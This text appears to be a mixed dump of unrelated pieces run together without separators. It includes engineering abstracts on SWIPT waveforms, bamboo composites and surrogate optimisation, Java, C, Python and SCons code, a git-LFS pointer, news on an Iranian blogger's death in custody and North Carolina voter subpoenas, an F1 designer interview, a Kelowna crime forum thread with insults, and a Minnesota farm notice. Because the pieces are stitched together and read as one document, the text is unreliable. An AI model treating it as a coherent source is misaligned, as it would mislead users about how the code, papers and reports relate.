Simultaneous Wireless Information and Power Transfer (SWIPT) has attracted significant attention in the communication community. The problem of waveform design has, however, never been addressed so far. In this paper, we first investigate how a communication waveform (OFDM) and a power waveform (multisine) compare with each other in terms of harvested energy. We show that due to the non-linearity of the rectifier and the randomness of the information symbols, the OFDM waveform is less efficient than the multisine waveform for wireless power transfer. This observation motivates the design of a novel SWIPT transceiver architecture relying on the superposition of multisine and OFDM waveforms at the transmitter and a power-splitting receiver equipped with an energy harvester and an information decoder. The superposed SWIPT waveform is optimized so as to maximize the rate-energy region of the whole system. Its design is adaptive to the channel state information and results from a posynomial maximization problem that originates from the non-linearity of the energy harvester. Numerical results illustrate the performance of the derived waveforms and SWIPT architecture. Key (and refreshing) observations are that 1) a power waveform (superposed to a communication waveform) is useful to enlarge the rate-energy region of SWIPT, 2) a combination of power splitting and time sharing is in general the best strategy, 3) exploiting the non-linearity of the rectifier is essential to design an efficient SWIPT architecture, and 4) a non-zero mean Gaussian input distribution outperforms the conventional capacity-achieving zero-mean Gaussian input distribution.
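To make the rectifier-nonlinearity argument concrete, here is a toy numerical comparison, not the paper's model: both signals occupy the same N tones with the same average power, but the deterministic in-phase multisine has a much higher fourth moment, which a truncated polynomial diode model rewards. The tone count, coefficients and normalisations below are arbitrary assumptions.

import numpy as np

rng = np.random.default_rng(1)
N, T = 8, 4096  # number of tones and time samples (arbitrary)
t = np.arange(T) / T
freqs = np.arange(1, N + 1)

# Multisine: deterministic, all tones in phase -> large coherent peaks.
multisine = sum(np.cos(2 * np.pi * f * t) for f in freqs) / np.sqrt(N)

# OFDM-like: random symbol phases on the same tones, same average power.
phases = rng.uniform(0, 2 * np.pi, N)
ofdm = sum(np.cos(2 * np.pi * f * t + ph) for f, ph in zip(freqs, phases)) / np.sqrt(N)

def dc_output(x):
    # Truncated 2nd/4th-order diode model: DC ~ k2*E[x^2] + k4*E[x^4].
    # The coefficients 1 and 0.5 are placeholders.
    return np.mean(x ** 2) + 0.5 * np.mean(x ** 4)

print(dc_output(multisine), dc_output(ofdm))  # multisine typically wins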
/*
 * Copyright 2019-2021 the original author or authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

package org.vividus.monitor;

import java.lang.reflect.AnnotatedElement;
import java.lang.reflect.Method;
import java.util.List;
import java.util.Optional;

import com.google.common.eventbus.EventBus;
import com.google.common.eventbus.Subscribe;

import org.jbehave.core.model.Scenario;
import org.jbehave.core.steps.NullStepMonitor;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.vividus.context.RunContext;
import org.vividus.model.RunningScenario;
import org.vividus.model.RunningStory;
import org.vividus.reporter.event.AttachmentPublishEvent;
import org.vividus.reporter.model.Attachment;
import org.vividus.selenium.IWebDriverProvider;
import org.vividus.selenium.screenshot.Screenshot;
import org.vividus.softassert.event.AssertionFailedEvent;

public abstract class AbstractScreenshotOnFailureMonitor extends NullStepMonitor {
    private static final String NO_SCREENSHOT_ON_FAILURE_META_NAME = "noScreenshotOnFailure";

    private static final Logger LOGGER = LoggerFactory.getLogger(AbstractScreenshotOnFailureMonitor.class);

    private List<String> debugModes;

    private final ThreadLocal<Boolean> takeScreenshotOnFailureEnabled = ThreadLocal.withInitial(() -> Boolean.FALSE);

    private final EventBus eventBus;
    private final RunContext runContext;
    private final IWebDriverProvider webDriverProvider;

    public AbstractScreenshotOnFailureMonitor(EventBus eventBus, RunContext runContext,
            IWebDriverProvider webDriverProvider) {
        this.eventBus = eventBus;
        this.runContext = runContext;
        this.webDriverProvider = webDriverProvider;
    }

    @Override
    public void beforePerforming(String step, boolean dryRun, Method method) {
        if (takeScreenshotOnFailure(method) && !isStoryHasNoScreenshotOnFailureMeta()
                && !isScenarioHasNoScreenshotsOnFailureMeta()) {
            enableScreenshotOnFailure();
        }
    }

    @Override
    public void afterPerforming(String step, boolean dryRun, Method method) {
        if (takeScreenshotOnFailure(method)) {
            disableScreenshotOnFailure();
        }
    }

    @Subscribe
    public void onAssertionFailure(AssertionFailedEvent event) {
        if (takeScreenshotOnFailureEnabled.get() && webDriverProvider.isWebDriverInitialized()) {
            try {
                takeAssertionFailureScreenshot("Assertion_Failure").ifPresent(screenshot -> {
                    Attachment attachment = new Attachment(screenshot.getData(), screenshot.getFileName());
                    eventBus.post(new AttachmentPublishEvent(attachment));
                });
            }
            // CHECKSTYLE:OFF
            catch (RuntimeException e) {
                LOGGER.error("Unable to take a screenshot", e);
            }
            // CHECKSTYLE:ON
        }
    }

    protected abstract Optional<Screenshot> takeAssertionFailureScreenshot(String screenshotName);

    private boolean takeScreenshotOnFailure(Method method) {
        if (method != null) {
            AnnotatedElement annotatedElement = method.isAnnotationPresent(TakeScreenshotOnFailure.class)
                    ? method : method.getDeclaringClass();
            TakeScreenshotOnFailure annotation = annotatedElement.getAnnotation(TakeScreenshotOnFailure.class);
            if (annotation != null) {
                String debugModeProperty = annotation.onlyInDebugMode();
                return debugModeProperty.isEmpty()
                        || debugModes != null && debugModes.stream().anyMatch(debugModeProperty::equals);
            }
        }
        return false;
    }

    private void enableScreenshotOnFailure() {
        takeScreenshotOnFailureEnabled.set(Boolean.TRUE);
    }

    private void disableScreenshotOnFailure() {
        takeScreenshotOnFailureEnabled.set(Boolean.FALSE);
    }

    private boolean isStoryHasNoScreenshotOnFailureMeta() {
        RunningStory runningStory = runContext.getRunningStory();
        return runningStory.getStory().getMeta().hasProperty(NO_SCREENSHOT_ON_FAILURE_META_NAME);
    }

    private boolean isScenarioHasNoScreenshotsOnFailureMeta() {
        return Optional.of(runContext.getRunningStory())
                .map(RunningStory::getRunningScenario)
                .map(RunningScenario::getScenario)
                .map(Scenario::getMeta)
                .map(m -> m.hasProperty(NO_SCREENSHOT_ON_FAILURE_META_NAME)).orElse(Boolean.FALSE);
    }

    public void setDebugModes(List<String> debugModes) {
        this.debugModes = debugModes;
    }
}
Effect of fiber content on thermal and mechanical properties of euphorbia coagulum modified polyester and bamboo fiber composite

In the present experimental investigation, the utilization of euphorbia coagulum as a binder to fabricate a euphorbia coagulum modified polyester and bamboo fiber composite using a compression molding technique was studied. Composites were fabricated by varying the concentration of pristine bamboo fiber (BF) as well as alkali-treated bamboo fiber from 25% to 50%, and also by modifying the polyester resin (PR) with euphorbia coagulum (EC). Structural and morphological changes of the fiber before and after alkali treatment were analyzed by XRD, SEM and FTIR, and the fabricated composites were characterized by scanning electron microscopy (SEM) and thermogravimetric analysis (TGA), with mechanical properties measured on a universal testing machine (UTM). Alkali treatment removed most of the hemicellulose and lignin content of the fiber, which increased the surface roughness of the fiber and changed its nature from hydrophilic to hydrophobic. This facilitates interlocking between fiber and matrix, resulting in improved mechanical properties of the composites. The maximum improvement in the mechanical and thermal properties of the composites was observed at 40% addition of both the pristine and the alkali-treated bamboo fiber in the polyester resin matrix. Moreover, it was observed that the addition of 30% euphorbia coagulum to the polyester resin further enhanced the mechanical and thermal properties of the composite and decreased water absorption. The composites developed were found to be eco-friendly and cost-effective, and can be considered for multipurpose panels, beams and pedestrian bridges.
import os
import fnmatch
from os.path import join

Import('env names addfiles')
# env: the basic env created in the SConstruct
# names: list of the names of all files in the
#        current directory
# addfiles: procedure
#    addfiles(sources, names, pattern)
#    adds to 'sources' all names in 'names'
#    that match 'pattern'

origEnv = env.Clone()

wd = Dir('.').srcnode().path
absWd = '#' + wd
print('Scanning ' + wd)

origEnv.Prepend(CPPPATH = [ '$tclap_include' ])
origEnv.Prepend(CPPPATH = [ '.' ])
if env['UseTICPP']:
    origEnv.Prepend(CPPPATH = [ '$ticpp_include' ])
origEnv.Prepend(LIBS = [ 'nuklei' ])

## nuklei ################

env = origEnv.Clone()

sources = [ 'nuklei.cpp', env.Glob('util/*.cpp') ]
target_name = 'nuklei'
target = os.path.join(env['BinDir'], target_name)

if env['BuildStaticExecutable']:
    env.Append(LIBPATH = [ "/usr/lib/atlas-base/atlas" ])
    env.Append(LINKFLAGS = [ "-static" ])
    product = env.Program(source = sources, target = target)
else:
    product = env.Program(source = sources, target = target)

env.Install(dir = '$BinInstallDir', source = product)
env.Alias(target_name, [ target ])
/*
 * cbfstool, CLI utility for CBFS file manipulation
 *
 * Copyright 2013 Google Inc.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; version 2 of the License.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <stdint.h>
#include "common.h"

size_t bgets(struct buffer *input, void *output, size_t len)
{
	len = input->size < len ? input->size : len;
	memmove(output, input->data, len);
	input->data += len;
	input->size -= len;
	return len;
}

size_t bputs(struct buffer *b, const void *data, size_t len)
{
	memmove(&b->data[b->size], data, len);
	b->size += len;
	return len;
}

/* The assumption in all this code is that we're given a pointer to enough
 * data. Hence, we do not check for underflow. */
static uint8_t get8(struct buffer *input)
{
	uint8_t ret = *input->data++;
	input->size--;
	return ret;
}

static uint16_t get16be(struct buffer *input)
{
	uint16_t ret;
	ret = get8(input) << 8;
	ret |= get8(input);
	return ret;
}

static uint32_t get32be(struct buffer *input)
{
	uint32_t ret;
	ret = get16be(input) << 16;
	ret |= get16be(input);
	return ret;
}

static uint64_t get64be(struct buffer *input)
{
	uint64_t ret;
	ret = get32be(input);
	ret <<= 32;
	ret |= get32be(input);
	return ret;
}

static void put8(struct buffer *input, uint8_t val)
{
	input->data[input->size] = val;
	input->size++;
}

static void put16be(struct buffer *input, uint16_t val)
{
	put8(input, val >> 8);
	put8(input, val);
}

static void put32be(struct buffer *input, uint32_t val)
{
	put16be(input, val >> 16);
	put16be(input, val);
}

static void put64be(struct buffer *input, uint64_t val)
{
	put32be(input, val >> 32);
	put32be(input, val);
}

static uint16_t get16le(struct buffer *input)
{
	uint16_t ret;
	ret = get8(input);
	ret |= get8(input) << 8;
	return ret;
}

static uint32_t get32le(struct buffer *input)
{
	uint32_t ret;
	ret = get16le(input);
	ret |= get16le(input) << 16;
	return ret;
}

static uint64_t get64le(struct buffer *input)
{
	uint64_t ret;
	uint32_t low;
	low = get32le(input);
	ret = get32le(input);
	ret <<= 32;
	ret |= low;
	return ret;
}

static void put16le(struct buffer *input, uint16_t val)
{
	put8(input, val);
	put8(input, val >> 8);
}

static void put32le(struct buffer *input, uint32_t val)
{
	put16le(input, val);
	put16le(input, val >> 16);
}

static void put64le(struct buffer *input, uint64_t val)
{
	put32le(input, val);
	put32le(input, val >> 32);
}

struct xdr xdr_be = {
	get8, get16be, get32be, get64be,
	put8, put16be, put32be, put64be
};

struct xdr xdr_le = {
	get8, get16le, get32le, get64le,
	put8, put16le, put32le, put64le
};
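As a quick, purely illustrative sanity check of the two byte orders implemented above (this is not part of cbfstool), Python's struct module reproduces the layouts:

import struct

val = 0x11223344
print(struct.pack(">I", val).hex())  # big-endian:    "11223344"
print(struct.pack("<I", val).hex())  # little-endian: "44332211"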
The 2016-17 edition of the University Directory is now available. The PDF, designed to be downloaded and printed, contains an information section, a departmental directory and a faculty/staff directory. The information contained was pulled from the information already available online in the browser-based versions of the departmental and faculty/staff directories. The online directories provide the most up-to-date contact information for UW departments and employees. For this year’s directory, click here.
The family of an Iranian blogger taken into custody over accusations of opposition activism on Facebook fears that he has died under torture. Police picked up Sattar Beheshti, 35, from his home in the city of Robat-Karim in the southwest of Tehran last week. His relatives said on Wednesday they had received phone calls from the prison authorities asking them to collect Beheshti's dead body from the notorious Kahrizak detention centre on Thursday. Beheshti's alleged death cannot be independently confirmed, but Baztab, a news website close to the senior politician Mohsen Rezaei, reported that the blogger had lost his life during interrogations. "Sattar Beheshti, who was arrested by Fata [cyber] police, has died while being interrogated," Baztab reported. Iran has recently been reported to have arrested a number of Facebook activists. Although Facebook is blocked in the country, millions of Iranians access it through proxy websites or virtual private networks. Sahamnews, a website close to the opposition leader Mehdi Karroubi, said Beheshti had died "under torture" during an interrogation session with security officials. "They called us today and asked us to collect his dead body tomorrow from Kahrizak," a family member told Sahamnews. Kahrizak is a detention centre where Iran imprisoned many of the opposition activists caught up in the protests that followed the country's disputed presidential elections in 2009. Before his arrest, Beheshti wrote in his blog: "They threatened me yesterday that my mother would wear black because I don't shut my mouth." Speaking to Masih Alinejad, a UK-based Iranian journalist, Beheshti's sister said: "Last Tuesday they raided our house and took my brother with them … Today they called my husband and asked him to prepare me and my mother and buy a tomb for his dead body." Commenting on reports of Beheshti's death, the UK's minister for the Middle East and North Africa, Alistair Burt, said: "I am shocked at reports that Sattar Beheshti, a young Iranian citizen, may have died in detention in Iran. Beheshti's only crime appears to be advocating the defence of human rights on the internet. "Tragically, we have seen many similar cases of Iranians being locked up and mistreated in prison for expressing such views. If these reports are true, this is yet another disgraceful attempt by the Iranian government to crush any form of free expression by its citizens. The Iranian authorities have full responsibility for Beheshti's welfare in prison and I call on Iran urgently to confirm what has happened to him." Many protesters are believed to have been tortured to death in Kahrizak, and several claim to have been raped. An Iranian doctor who examined the victims of Kahrizak was shot dead in September 2010. Kahrizak became a scandal for the regime when Mohsen Rouholamini, the son of a former senior adviser to the Revolutionary Guards, was named among prisoners who had died at the centre.
Adrian Newey, Chief Technical Officer of Red Bull Racing, is rightly held in high regard in the world of Formula 1, regularly described as a genius by his peers. He is the only designer to have won Constructors' Championships with three different teams: eight in total, spanning Williams' domination of the early 90s, a 1998 McLaren victory and now two back-to-back titles with Red Bull Racing in 2010 and 2011. His cars have notched up well over 100 race wins and 7 drivers' championships. F1 racing has always been a spearhead for innovation in design and technology, but more than ever the sport is developing into a mass of computer systems, automated design tools and programmed precision engineering. With each year the sport moves further from its human roots; the days of drivers such as Graham Hill tinkering in a garage are a distant memory. A classic charm envelops designer Newey, immediately changing the atmosphere of the room where we meet as he quietly takes a seat within the pressroom of Goodwood House during the 2012 Festival of Speed. Today Adrian Newey is here as a driver, joining his Red Bull colleagues Christian Horner, Sebastian Vettel and Mark Webber in driving the latest Infiniti Hybrid cars up the historic hill climb circuit. Despite his impressive racing driver credentials, his mastery of design and his influences are the subject of our interview, and a subject he still seems boyishly excited to discuss, his enthusiasm veiled beneath a calm and analytical thought process behind every answer.

The last dinosaur of the pit lane

In an age of endless technology Newey's ideas still flow from a 2B pencil and a single sheet of A4 paper – he calls himself 'the last dinosaur in the industry.' "I think more than anything I am a creature of habit, as that is the way I grew up, which was before CAD systems became prevalent," Newey tells Humans Invent. "But also, what I like about using a drawing board is that I can sketch. CAD systems still haven't quite made that as easy as pen and paper." Of course, Newey understands and respects the importance of modern technology and research tools in creating race-winning performance, adapting his free-hand design habits to the demands of a modern environment. "Nowadays everything has to go onto a CAD system because you need to test it in CFD (computational fluid dynamics). Everything nowadays is researched and manufactured using computer-aided machinery. I have a small team of people who transfer my drawings, scan them and transform them into solid models." When questioned on the development of the sport, Newey describes how dramatically F1 has changed since he first stepped foot in a garage. "When I started on my first F1 car for Fittipaldi, as a team there was probably 50 people with only 8 engineers. Obviously as teams got bigger, and the industry in general has moved forwards, the tools changed. In those days you only had very basic research tools. Now, there are much bigger research teams who are able to look at things in far more detail – and that changes how you go about the design." "I think the major change is the understanding. If you look back to the 70s, the shape of Formula 1 cars along the grid were all hugely different to each other. A team would come up with a new car for a new season. If the new car wasn't quicker after a couple of races, they would give up and go back to last season's car. I'm sure the designer of that car had come up with an idea and thought it to be quicker otherwise he wouldn't have made the change.
And that's because they didn't have the research tools to give them a level of understanding to make sure that when they did something, it was going to be a step forwards." "That's what has changed now, when you come up with ideas you can try to research them much more carefully, so that hopefully the first time it goes on the track it performs how you hope and expect."

Armed with a pad and a pen

The transfer of Newey's freehand sketches to modern design tools is a time-consuming process but one that is a necessity for Newey, as his pencil and notepad rarely leave his side. "I think generally it's just important having your eyes open. The brain's a strange organ. You see something and think it's interesting and then there will be a problem and you will flick away through your sub-conscious for an hour, a day, a week and then an idea will pop up and you go from there." "I am always fearful that my memory isn't very good. In fact I know it's not very good! So I'll usually make a note of a design on a stickit, or I'll just draw it there and then. Very often I work on a 24-hour rule. If I still think it is a good idea after 24 hours I will take it further, if not I'll screw it up and throw it in the bin." When asked what he aims to achieve when designing F1 cars, Newey quickly shuns any artistic ideals. "For us it is purely performance. I think that's what makes Formula 1 different to other areas of design. There is no prize for the prettiest car, only the quickest car." Despite this, one can't help but feel Newey uses his influences not only for performance but for designs which are aesthetically attractive. The constant referencing of aeronautical design by Newey underpins a deep passion for clean lines. He holds a First Class Honours degree in the subject from Southampton University, and when questioned on what he believes to be his favourite design ever, he clearly and confidently says "Concorde" after a mere three seconds of quizzical contemplation. "It's a beautiful shape and ahead of its time by some way. Both the Russians and the Americans tried to copy it and failed. It flew reliably for all those years and I just think it was so ahead of its time." "I think that period of aeronautical development from the end of the war through to the mid 60s was quite astounding when you consider in 1942 we were in Spitfires, and then by 1962 Blackbird was flying at three times the speed of sound. Literally in 20 years it went from piston-engined fairly rudimental aircraft to something like Blackbird." Newey would seem a perfect fit for such an era: arriving to work in a suit, endlessly sketching out designs hunched over his drawing board. A mild manner, an air of confidence, a touch of eccentricity and undoubted genius all hark back to a period of maverick British design, allowing him to move in the same circles as historical greats such as Barnes Wallis and R J Mitchell.

The tragedy at Imola

Designing boundary-pushing racecars has obvious dangers and potential pitfalls. In an interview with The Guardian, Newey spoke of the emotional trauma he faced following the death of triple World Champion and racing icon Ayrton Senna behind the wheel of one of his designs at Imola in 1994, an event which almost saw the end of his career within the sport. The 12-month period following the accident saw Newey face charges of manslaughter, as well as a personal in-depth examination of whether or not a design fault contributed to the death of Senna.
Having looked at all the data and the crash wreckage, Newey believes the most realistic cause of the accident was a rear-right puncture and not a design fault traceable to him. The undoubted stress placed upon Newey and his fellow Williams colleagues clearly affected the man, mentally and physically. He believes the ensuing months of stress and turmoil resulted in his now identifiable bald head. This year's F1 championship, with six world champions vying for the title and eight different race winners already, has been described as a new golden era for the sport; however, the major talking point is the new Pirelli tyres. "They are very tricky to operate in exactly the right window and what we see every week is some teams getting them to operate in the right window, and others not. That's the difficult bit to understand." At Silverstone, Red Bull's tyre strategy secured a Mark Webber win and a Vettel third place at the 2012 British Grand Prix. The call on tyres ensured Webber was able to pass race leader Fernando Alonso with only four laps remaining, securing yet another career victory for Adrian Newey and one of his cars. Alongside making the right calls, it's an ominous warning for the rest of the F1 field that once again Newey's design has delivered a car that is quick and capable of race wins. Just don't tell him the Red Bull looks pretty.

Photo Credits: Silverstone Circuit Ltd, Infiniti Global and Red Bull Racing. Read the full article over at Humans Invent. Humans Invent is an online space dedicated to celebrating innovation, craftsmanship and design fueled by our most natural instinct – the pursuit of invention to help solve a human need.
package com.edwise.pocs.springboot.controllers;

import org.junit.Before;
import org.junit.Test;

import static org.hamcrest.Matchers.is;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertThat;

public class HelloWorldControllerTest {

    private HelloWorldController helloWorldController;

    @Before
    public void setUp() {
        helloWorldController = new HelloWorldController();
    }

    @Test
    public void testSayHelloWorld() {
        String msgResult = helloWorldController.sayHelloWorld();

        assertNotNull(msgResult);
        assertThat(msgResult, is("Hello World in your SpringBoot Application!"));
    }
}
version https://git-lfs.github.com/spec/v1 oid sha256:e62f4553962e858e5923d9688b63fb28fb89d4ea1269540b2a3ed9bbb61b2db1 size 826448
Design Optimization Utilizing Dynamic Substructuring and Artificial Intelligence Techniques

In mechanical and structural systems, resonance may cause large strains and stresses which can lead to the failure of the system. Since it is often not possible to change the frequency content of the external load excitation, the phenomenon can only be avoided by updating the design of the structure. In this paper, a design optimization strategy based on the integration of the Component Mode Synthesis (CMS) method with numerical optimization techniques is presented. For reasons of numerical efficiency, a Finite Element (FE) model is represented by a surrogate model which is a function of the design parameters. The surrogate model is obtained in four steps: First, the reduced FE models of the components are derived using the CMS method. Then the components are assembled to obtain the entire structural response. Afterwards the dynamic behavior is determined for a number of design parameter settings. Finally, the surrogate model representing the dynamic behavior is obtained. In this research, the surrogate model is determined using Backpropagation Neural Networks, which is then optimized using Genetic Algorithms and the Sequential Quadratic Programming method. The application of the introduced techniques is demonstrated on a simple test problem.
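A minimal sketch of the surrogate-plus-optimizer loop described in this abstract is given below. It is illustrative only: an assumed analytic function stands in for the reduced CMS/FE model, the genetic-algorithm stage is omitted, and scipy's SLSQP plays the role of the Sequential Quadratic Programming step. All names and settings are hypothetical.

import numpy as np
from sklearn.neural_network import MLPRegressor
from scipy.optimize import minimize

def fe_response(x):
    # Hypothetical stand-in for the (expensive) reduced FE model.
    return np.sin(3 * x[..., 0]) + 0.5 * (x[..., 1] - 0.3) ** 2

rng = np.random.default_rng(0)
X = rng.uniform(0, 1, size=(200, 2))  # sampled design-parameter settings
y = fe_response(X)

# Backpropagation neural network as the surrogate of the dynamic response.
surrogate = MLPRegressor(hidden_layer_sizes=(32, 32), max_iter=5000,
                         random_state=0).fit(X, y)

# Gradient-based refinement of the surrogate minimum (SQP-like step).
res = minimize(lambda x: float(surrogate.predict(x.reshape(1, -1))[0]),
               x0=np.array([0.5, 0.5]), method="SLSQP",
               bounds=[(0.0, 1.0), (0.0, 1.0)])
print(res.x, res.fun)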
# Try/Except
# First it will try to execute the try block; if an exception occurs, it will
# execute the except block.
# Something as bare as this is considered bad practice.
try:
    # print(ola)
    pass
except:
    print('Error')
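Since the comment above flags the bare except as bad practice, a slightly fuller version would catch only the exception it expects and keep the error message (the variable name is hypothetical):

# Preferred: catch the specific exception and preserve its message.
try:
    print(ola)  # 'ola' is not defined, so this raises NameError
except NameError as exc:
    print(f'Error: {exc}')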
// NOTE: imports reconstructed; the javax (pre-Jakarta) namespace is assumed.
import java.io.Serializable;

import javax.persistence.Basic;
import javax.persistence.Column;
import javax.persistence.Embeddable;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;

/**
 *
 * @author Carlos Vasquez Polanco
 */
@Embeddable
public class WorkPK implements Serializable {

    private static final long serialVersionUID = 2003773541626332733L;

    @Basic(optional = false)
    @NotNull
    @Size(min = 1, max = 300)
    @Column(name = "from_id")
    private String fromId;

    @Basic(optional = false)
    @NotNull
    @Size(min = 1, max = 300)
    @Column(name = "work_id")
    private String workId;

    public WorkPK() {
    }

    public WorkPK(String fromId, String workId) {
        this.fromId = fromId;
        this.workId = workId;
    }

    public String getFromId() {
        return fromId;
    }

    public void setFromId(String fromId) {
        this.fromId = fromId;
    }

    public String getWorkId() {
        return workId;
    }

    public void setWorkId(String workId) {
        this.workId = workId;
    }

    @Override
    public int hashCode() {
        int hash = 0;
        hash += (fromId != null ? fromId.hashCode() : 0);
        hash += (workId != null ? workId.hashCode() : 0);
        return hash;
    }

    @Override
    public boolean equals(Object object) {
        if (!(object instanceof WorkPK)) {
            return false;
        }
        WorkPK other = (WorkPK) object;
        if ((this.fromId == null && other.fromId != null)
                || (this.fromId != null && !this.fromId.equals(other.fromId))) {
            return false;
        }
        return (this.workId != null || other.workId == null)
                && (this.workId == null || this.workId.equals(other.workId));
    }

    @Override
    public String toString() {
        return "WorkPK{" + "fromId=" + fromId + ", workId=" + workId + '}';
    }
}
Why don't our Kelowna police do this? Penticton at least seems to be TRYING TO DO SOMETHING about their problems. They are trying to police things rather than just giving the druggies, thieves, vandals, destroyers etc a free rein. THERE ARE NO LAWS ANYMORE!!! It's that simple - they can do whatever they want and know it.

To me, this is the BIG difference between the majority of our City Council/Police and others... ours say "there's no easy answer", and "we can't arrest our way out of this" while doing nothing but enabling the slide to continue... things of that nature. Ours say "we are doing something, look at Journey Home, all the wet facilities we are building". Others, like Penticton, say things like "let's involve the downtown and brainstorm", "let's increase patrols" etc - they are trying to take a hard stand and DISCOURAGE drug use and crime whereas we openly ENABLE it, thereby ENCOURAGING the continued criminal behaviour.

Do we have mini-forums with the police on a regular basis where the police meet with the businesses/residents? Maybe we do and I have just missed all the news articles on it. Funny tho, I work right in the thick of things downtown and haven't seen one letter come to my office advising of any mini-forum, or a brain-storming session with the police, or any council people.

Journey Home had some input from the businesses and the business owners were up in arms and took a firm stance, and when they were doing that it seemed a few things were put into place to make it better. Soon as they let their foot off the gas on their complaints though, the more visible police presence has fallen off again and the vandalism etc has picked right back up. They had put on more patrols which WERE WORKING - could actually SEE cops downtown during the day - and then when things showed signs of improving a bit they slowed them down again - guess what? No cops around and things are taking a turn for the worse again.

If those of us against enabling drug use (and thereby encouraging crime) speak up against these seemingly useless methods, we are told we don't know what we are talking about, we are heartless, we are misinformed, there is no easy solution. I agree, there is no easy SOLUTION, but a good start would be bringing back law & order. Journey Home is years away and its success or failure is also years away, yet to be unveiled. Our once beautiful City, especially the downtown, will be a cesspool by then.

The downtown "vulnerable & marginalized inhabitants" hate their lives so much they destroy others' just for funsies. So, what do we do about it? We build wet houses to enable them to continue on in their hated lives instead of rehabs to give them a chance at a real life. Just look at the destruction done downtown this week. I think I heard a cop caught one in the act of booting in windows... tell me, what did he do with that guy - the report didn't say. Haul his *bleep* to jail? Extremely Doubtful. Give him a "stern" warning not to do it again and let him go? DOLLARS TO DONUTS. Destruction, costing those affected many dollars to fix, knowing it will just happen again and that their police force will do nothing about it - that's the bare bones truth of the matter.

I think the druggies and thieves WANT the downtown AND KNOW they are winning... they want to force it into a slum state and drive out the businesses, and the majority of City Council/Police are making it real easy for them to do that - a slam dunk.
All the residents/tourists of these fancy skyrises Mayor Nose in the Sky & his cheerleaders are approving aren't going to like their surroundings very much once they actually live here, but then when those people sound a hullabaloo about it maybe then we will see some law and order. Why would we be building wet facilities to enable them to continue on with their hated lives instead of rehabs? We are wasting our money and putting the rest of the citizenry in their sights to be victims of their drug lifestyle. It should be spent on the rehabs and dry facilities. Wet facilities - supposedly to keep them alive to make the choice to quit themselves. Except - very very few will ever make that choice - they will either keep on drugging because they can with our help, or they will die before they can make the choice. Meanwhile the rest of the City suffers at their hands either directly or indirectly.

I would actually like to see the numbers on the "successes" of wet facilities regarding Kelowna. Anyone who has actually used a wet facility and then made the choice on their own to quit a severe addiction is big news in this fight we are having. That would be a true success story and you'd think they'd be shouting it from the roof-tops with well deserved pride and proving the enabling worked for them - or the facilitators would be crowing about the plan working and saying see, here's proof in the numbers. I'd like to read their stories.

All this is MPO. All of you who are typing furiously telling me to shut up unless I have a plan for solving it myself are entitled to yours. My plan is to keep nattering in the hopes the cops (for starters at least) begin enforcing the damn laws that already exist to protect ALL of us, not just the vandals, the thieves, the drug addicts, the destroyers. I hope all of us who feel the same keep putting it out there - maybe someone who feels the same who is in a position of power to do something real about it will take up the cause.

dle wrote: Why don't our Kelowna police do this? Penticton at least seems to be TRYING TO DO SOMETHING about their problems.

Nope. Just blah blah blah by the head piece of garbage. De Jager blames victims for being victims. He is scum. Be thankful that you don't have this excrement in your town.

Oh please don't you too get sucked down that rabbit hole of BS. Colonel Klink here in Penticton is just preaching to the choir. Serious crime like murders, shootings, and violent assaults are not the problem. It is the low level chit..... can't leave a bike in the yard, car window broken and car rifled cuz a loonie was on the console, shop/garage broken into. What do you get? A file number to give to your insurance adjuster so your deductible goes up.
The North Carolina Attorney General’s Office has sent a letter to the U.S. Attorney’s Office for the Eastern District of the state asking them to immediately withdraw their overly broad subpoenas for millions of voters’ information. The State Board voted at a Friday morning meeting to have the Attorney General’s Office work to quash the 45 unprecedented subpoenas for a wide breadth of voter information, including cast ballots. Read more about it here and here, and read the full letter from Zellinger below.
The Minnesota Farm Bureau’s sesquicentennial farm program will honor Minnesota families who have owned their farms for at least 150 years. Since the sesquicentennial farm program began in 2008, more than 225 farms have been recognized. • The farm must be at least 150 years old this year (2019) according to the abstract of title, land patent, original deed, county land records, court file in registration proceedings or other authentic land records. Please do not send originals or copies of records. • The family must have owned the farm for 150 years or more. “Family” is defined as parents, grandparents, aunts, uncles, brothers, sisters, sons, daughters, first cousins and direct in-laws (father, mother, brother, sister, daughter, son-in-law). • Continuous residence on the farm is not required, but ownership must be continuous. • The farm should consist of 50 or more acres and currently be involved in agricultural production. A commemorative certificate signed by Kevin Paap, Minnesota Farm Bureau Federation president, Thom Peterson, Minnesota Department of Agriculture commissioner, and Governor Tim Walz will be awarded to qualifying families, along with an outdoor sign signifying the sesquicentennial farm recognition. Applications are available by writing Sesquicentennial Farms, Minnesota Farm Bureau Federation, P.O. Box 64370, St. Paul, MN, 55164; e-mailing [email protected] or calling (651) 768-2100. Applications are also available online. The deadline for application is March 1. Previously recognized families should not reapply. Century Farms are not automatically recognized as sesquicentennial farms. Families must apply to receive sesquicentennial farm recognition. County Farm Bureaus are encouraged to work with county agriculture societies and county fair boards on local recognition of recipients. Recipients will be announced at the beginning of June. To see a list of previously recognized sesquicentennial farms, visit fbmn.org.
"""MyLib"""

def hello_world():
    print("Hello world")
